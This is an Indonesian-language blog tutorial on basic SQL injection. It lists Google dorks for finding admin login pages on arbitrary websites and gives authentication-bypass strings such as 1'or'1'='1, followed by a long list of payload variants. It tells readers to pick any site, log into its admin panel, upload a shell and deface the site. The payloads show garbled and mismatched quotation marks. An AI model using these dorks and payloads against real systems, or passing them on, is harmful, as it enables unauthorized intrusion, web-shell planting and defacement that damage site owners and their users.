Dalam tutorial ini saya akan menunjukkan kepada kalian dasar SQL Injection.Baca juga Pengertian Dasar - Dasar Kriptografi
Saya akan menunjukkan cara untuk menemukan website panel admin menggunakan google dork sederhana dan query SQL untuk bypass admin nama pengguna dan password dan masuk ke dalam panel. Ketika Anda berada di panel hanya menemukan pilihan upload dan meng-upload shell Anda, kemudian deface itu.
Dorks:
inurl: adminlogin.aspx
inurl: admin / index.php
inurl: administrator.php
inurl: administrator.asp
inurl: login.asp
inurl: login.aspx
inurl: login.php
inurl: admin / index.php
inurl: adminlogin.aspx
Ratusan situs akan membuka memiliki /adminlogin.aspx di URL mereka. Pilih situs web apapun, Anda akan mendapatkan area dari mana admin login. Isi rincian sebagai:
User: 1'or'1 '=' 1
Password: 1'or'1 '=' 1
Teknik SQL Injection lain:
‘ or 1=1 –Gunakan atas rincian yang disebutkan login dan Anda akan masuk ke panel admin website. Saya tidak akan bekerja untuk semua situs web yang Anda akan menemukan, tapi akan bekerja pada sebagian besar situs web.Baca juga Teknik Dasar Metode Social Engineering
1'or’1'=’1
admin’–
” or 0=0 –
or 0=0 –
‘ or 0=0 #
” or 0=0 #
or 0=0 #
‘ or ‘x’='x
” or “x”=”x
‘) or (‘x’='x
‘ or 1=1–
” or 1=1–
or 1=1–
‘ or a=a–
” or “a”=”a
‘) or (‘a’='a
“) or (“a”=”a
hi” or “a”=”a
hi” or 1=1 –
hi’ or 1=1 –
hi’ or ‘a’='a
hi’) or (‘a’='a
hi”) or (“a”=”)